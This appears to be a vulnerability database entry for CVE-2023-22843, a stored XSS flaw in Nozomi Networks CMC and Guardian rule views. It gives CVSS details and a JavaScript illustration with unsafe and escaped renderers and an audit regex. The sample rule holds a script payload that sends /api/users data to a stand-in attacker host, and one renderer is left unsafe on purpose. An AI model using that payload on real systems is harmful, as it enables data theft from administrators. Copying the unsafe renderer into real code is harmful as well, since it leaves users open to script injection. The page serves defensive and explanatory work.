MEDIUM · 6.4

CVE-2023-22843

An authenticated attacker with administrative access to the web management interface can inject malicious JavaScript code into the definition of a Threat Intelligence rule; the payload is stored and can later be executed by another legitimate user viewing the details of that rule.

Vulnerability Description

An authenticated attacker with administrative access to the web management interface can inject malicious JavaScript code into the definition of a Threat Intelligence rule. The payload is stored and can later be executed in the browser of another legitimate user who views the details of that rule. Through this stored Cross-Site Scripting (XSS), an attacker may be able to perform unauthorized actions on behalf of legitimate users and/or gather sensitive information. JavaScript injection was possible in the contents of YARA rules, while only limited HTML injection has been demonstrated for packet and STYX rules.
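The mechanism above, as an added illustration that is not Nozomi Networks code: a rule-detail view that concatenates stored rule content straight into HTML (the vulnerable pattern) beside the same view with output encoding (the fix), plus a small audit helper for operators who want to check rules stored on a pre-22.6.2 install. The rule object shape, the render functions and the placement of the payload in a YARA comment are all assumptions; the advisory only states that the payload lives inside the rule definition. The sample rule is constructed for this example.

```javascript
// Added example (not Nozomi Networks code). Hypothetical rule viewer showing
// how stored XSS in a Threat Intelligence rule arises and how HTML encoding
// prevents it. The rule object shape is an assumption.

// Constructed sample rule: a YARA body carrying an HTML payload in a comment.
// Where the real payload sat inside the rule is an assumption; the advisory
// only says it was inside the rule definition.
const INJECTED_YARA_RULE = {
  id: 42,
  type: "yara",
  name: "suspicious_payload",
  content: [
    "rule suspicious_payload {",
    "  // <script>fetch('/api/users').then(r=>r.text()).then(t=>fetch('https://attacker.invalid/?d='+encodeURIComponent(t)))</script>",
    "  strings:",
    '    $a = "evil"',
    "  condition:",
    "    $a",
    "}",
  ].join("\n"),
};

// Vulnerable pattern: stored content is concatenated straight into markup.
// <pre> is not a raw-text element, so a <script> tag inside it still runs
// when another admin opens the rule detail page.
function renderRuleDetailUnsafe(rule) {
  return `<h2>${rule.name}</h2><pre class="rule-${rule.type}">${rule.content}</pre>`;
}

// Fix: HTML-encode every untrusted field before it reaches the page.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderRuleDetailSafe(rule) {
  return `<h2>${escapeHtml(rule.name)}</h2>` +
    `<pre class="rule-${escapeHtml(rule.type)}">${escapeHtml(rule.content)}</pre>`;
}

// Audit heuristic for operators: rule text rarely has a reason to contain
// HTML tags, inline event handlers or javascript: URLs. Matches are flagged
// for review, not blocked, because YARA strings may legitimately contain "<".
const HTML_MARKUP = /<\s*\/?\s*[a-z][^>]*>|\bon[a-z]+\s*=|javascript:/i;

function auditRules(rules) {
  return rules
    .filter((r) => HTML_MARKUP.test(r.content) || HTML_MARKUP.test(r.name))
    .map((r) => ({ id: r.id, name: r.name }));
}

// Stand-alone demonstration.
function demo() {
  const benign = { id: 7, type: "yara", name: "benign", content: "rule b { condition: true }" };
  console.log("unsafe:", renderRuleDetailUnsafe(INJECTED_YARA_RULE));
  console.log("safe:", renderRuleDetailSafe(INJECTED_YARA_RULE));
  console.log("flagged:", auditRules([INJECTED_YARA_RULE, benign]));
}
demo();
```

The unsafe output contains a live `<script>` element; the safe output shows the identical rule text with every tag rendered literally. Encoding at output time is the fix the CVSS vector implies (UI:R, a victim must view the rule); input validation on rule save is a useful second layer but not a substitute, since packet and STYX rule content also reaches the same viewer.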

CVSS Score

6.4

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality: HIGH
Integrity: HIGH
Availability: LOW

Affected Products

Vendor           Product   Versions
Nozomi Networks  CMC       < 22.6.2
Nozomi Networks  Guardian  < 22.6.2

Related Weaknesses (CWE)

References

FAQ

What is CVE-2023-22843?

CVE-2023-22843 is a stored Cross-Site Scripting vulnerability with a CVSS score of 6.4 (MEDIUM). An authenticated attacker with administrative access to the web management interface can inject malicious JavaScript code into the definition of a Threat Intelligence rule; the payload is stored and can later be executed by another legitimate user viewing the details of that rule.

How severe is CVE-2023-22843?

CVE-2023-22843 has been rated MEDIUM with a CVSS 3.1 base score of 6.4/10. The score is limited by the high privileges required (administrative access) and the need for a victim to view the rule. Review the CVSS metrics above for a detailed severity breakdown.

Is there a patch for CVE-2023-22843?

No vendor advisory is listed in the references section above. According to the affected-products table, only versions earlier than 22.6.2 of Nozomi Networks CMC and Guardian are affected, so upgrading to 22.6.2 or later addresses the issue.